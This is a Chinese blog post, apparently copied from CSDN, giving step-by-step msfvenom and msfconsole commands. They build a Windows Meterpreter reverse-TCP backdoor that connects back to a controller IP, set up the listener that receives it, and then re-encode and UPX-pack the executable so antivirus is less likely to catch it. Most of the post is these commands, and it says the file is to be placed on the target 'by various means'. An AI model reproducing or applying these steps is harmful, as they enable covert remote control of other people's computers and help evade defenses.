码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • msfvenom制作主控与被控端


    • msfconsole
    • msfvenom -p windows/meterpreter/reverse_tcp lhost 192.168.107.135 lport 5000 -f exe -o /var/payload.exe

    说明:-p或--payload 后面接载荷 查看msf都有哪些载荷可以通过 msfvenom -l payloads 命令

               lhost 填写主控端IP     lpost填写主控端端口

              -f 或 --format  接输出文件的格式

             -o 或 --out  指定文件存放路径

             --payload-options   //列举payload的标准参数项

            --help-formats      //列举msf支持的输出文件格式

    关于msfvenom更详细参数使用可以参看:Metasploit——msfvenom免杀木马_小白白@的博客-CSDN博客_msfvenom免杀

    生成的payload.exe采用各种方法存放在被控端

    在主控端msfconsole下执行

    •             use exploit/multi/handler
    •             set payload windows/meterpreter/reverse_tcp  //需要与生成被控端时的payload一致
    •             set lhost 192.168.107.135
    •             set lport 5000  //这两条须与生成被控端时设置的主控端IP和端口一致
    •             exploit

    被控端执行payload.exe后,在主控端可以看到信息:

    此时主控端与被控端建立连接 。但是由于这个工具被用烂了,一般生成的被控端都会被查杀,所以通常都会对被控端进行重编码。

    msf框架里的编码功能可以对被控端进行重新编码,多次编码,多种方式混合编码

    执行 msfvenom -l encoder 可以查看编码器列表,excellent级的编码器效果更好

    • msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.107.135 lport=5000 -e x86/nonalpha -f c

    此处输出格式选C,可以在屏幕上看到编码结果,想了解多次、混合编码效果可以输出这种格式,比较low的编码出来的代码是不变的,如上例。

    • msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.107.135 LPORT=5000 -e x86/shikata_ga_nai -i 10 -f raw |msfvenom -a x86 --platform Windows -e x86/alpha_upper -i 5 -f exe -o /var/payload.exe

    上面的命令 -i 10 表示编码10,混合编码要写多次msfvenom用并|分隔 

    第二种编码不能缺--platform Windows,会执行不下去,第一种编码写不写都会报错,但是可以继续执行,原因暂不明

     即使多次编码了,还是多半也被查出来,此时可以采用“加壳”的办法

    upx /var/payload.exe

    本文仅仅只是记录思路和命令,如上操作的被控端绝大部分还是会被查杀

  • 相关阅读:
    【毕业设计】单片机远程wifi红外无接触体温测量系统 - 物联网 stm32
    通讯网关软件016——利用CommGate X2Access实现OPC数据转储Access
    八、SpringMVC(2)
    My Eighty-seventh Page - 买卖股票的最佳时机 - By Nicolas
    django路由匹配、反向解析、无名有名反向解析、路由分发、名称空间
    vxe-table 表格尾部小计列项再合计展示
    【单片机毕业设计】【mcuclub-hj-012】基于单片机的空气质量(CO、有害混合气体)检测的设计
    Python Opencv实践 - SIFT关键点检测
    我的世界Bukkit服务器插件开发教程(十)实体
    利用 python 脚本 PyRdp 设置 RDS 服务器蜜罐 Honeypot
  • 原文地址:https://blog.csdn.net/angleoldhen/article/details/126019023
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号